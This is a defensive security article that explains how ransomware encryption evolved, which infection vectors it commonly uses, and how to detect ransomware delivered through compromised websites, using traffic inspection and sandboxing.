Ransomware has been getting a lot of press lately, and understandably so. In recent months, there has been a tidal wave of ransomware attacks targeting numerous well-known organizations, and the threat is expected to continue to wreak havoc across the world in the future.
The aim of a ransomware attack is to infect users’ systems, and deny them access to their most valuable assets. Typically, this is accomplished by encrypting the most important documents on the target machine and making them unreadable and inaccessible.
The Evolution of Ransomware
Initially, ransomware attackers used the same key for encryption and decryption. Reverse engineers were able to develop decryption tools for each variant, so encrypted files were easily restored in a relatively short period of time. Ransomware authors quickly learned from their mistakes so most ransomware variants now use asymmetric-key cryptography, where data is encrypted with one key but decryption requires a different key that is not so readily available to the victim.
Alternatively, the data is encrypted using a symmetric key, but then that key is encrypted using an asymmetric key. Either way, it’s now much more difficult to restore files without paying for the decryption key.
This is one of the key reasons why ransomware has recently become such a success for cyber-criminals. There is no easy way for victims to get their data back and there are no standard one-size-fits-all decryption keys. Additionally, in cases where criminals are still using symmetric keys and security analysts are able to figure out the decryption key and release it, the attacker can quickly release an updated version that uses a different decryption key.
Commonly Used Attack Vectors
Choosing the ransomware delivery mechanism is mostly a question of money. Spreading spam is cheaper than writing new malware exploits or leasing encryption keys, but there is greater uncertainty as to the effectiveness and ultimate success of the attack. Today infection vectors most commonly used by ransomware actors are email attachments, links in emails, compromised websites, and malvertising.
Emails attachments and links – The attacker sends an email to victims trying to trick them into opening a document attached to the email or click on a link embedded in the content of the email.
Malvertising – Threat actors use web advertisements–banner ads delivered via legitimate ad services–to spread malicious code and ransomware. The ad services try to block any malicious ads, but the criminals are very good at evading detection.
Compromised websites – Cyber-criminals are able to compromise legitimate websites by embedding malicious code. When a user visits a compromised website, it redirects them to a landing page that installs the ransomware payload. Alternatively, criminals develop spoof websites that look nearly identical to the legitimate one and are reached via a URL that is nearly indistinguishable from the original. When a victim mistakenly visits these sites, they too will install the ransomware.
Mitigating ransomware attacks on compromised websites
While mitigating email-based and malvertising attacks also warrant careful attention and techniques, the focus of this article is on mitigating ransomware attacks that use compromised websites.
When an attack is using a website that security products have already identified as having been compromised or hosting malicious behavior, it can be blocked by looking at the domain or IP used in the link embedded in the email or the URL visited by a user. In practice, however, simple blacklisting approaches suffer from the relatively short lifespan of these drive-by landing pages.
To cope with this problem of blacklisting short-lived content, security solutions must find the attack “on the wire”. This means that the system either proactively probes for the content of a website, or it waits until a real user is tricked into following the link to the exploit site and finds the attack in the live traffic.
A particularly effective method of attack is by finding suspicious modifications of web page content, such as the use of inline frames with hidden attributes or obfuscated JavaScript. When such an anomaly is found in a page in transit, a security product can block a user from accessing any additional content from this site. This prevents exploit kit code from reaching and exploiting a user’s browser.
However, not all attacks make use of exploit kits: often, victims are simply tricked into downloading and running the ransomware payload. Thus, security technologies need to intercept these downloads and evaluate if the file is safe to be opened by a user – typically by running the program inside a sandbox.
Ransomware is one of the most dangerous attack vectors around today and it is generating a healthy return for cyber-criminals across the world. It is also critical that the security industry takes aggressive steps to understand advancements in ransomware as only then can the threat be properly held at bay.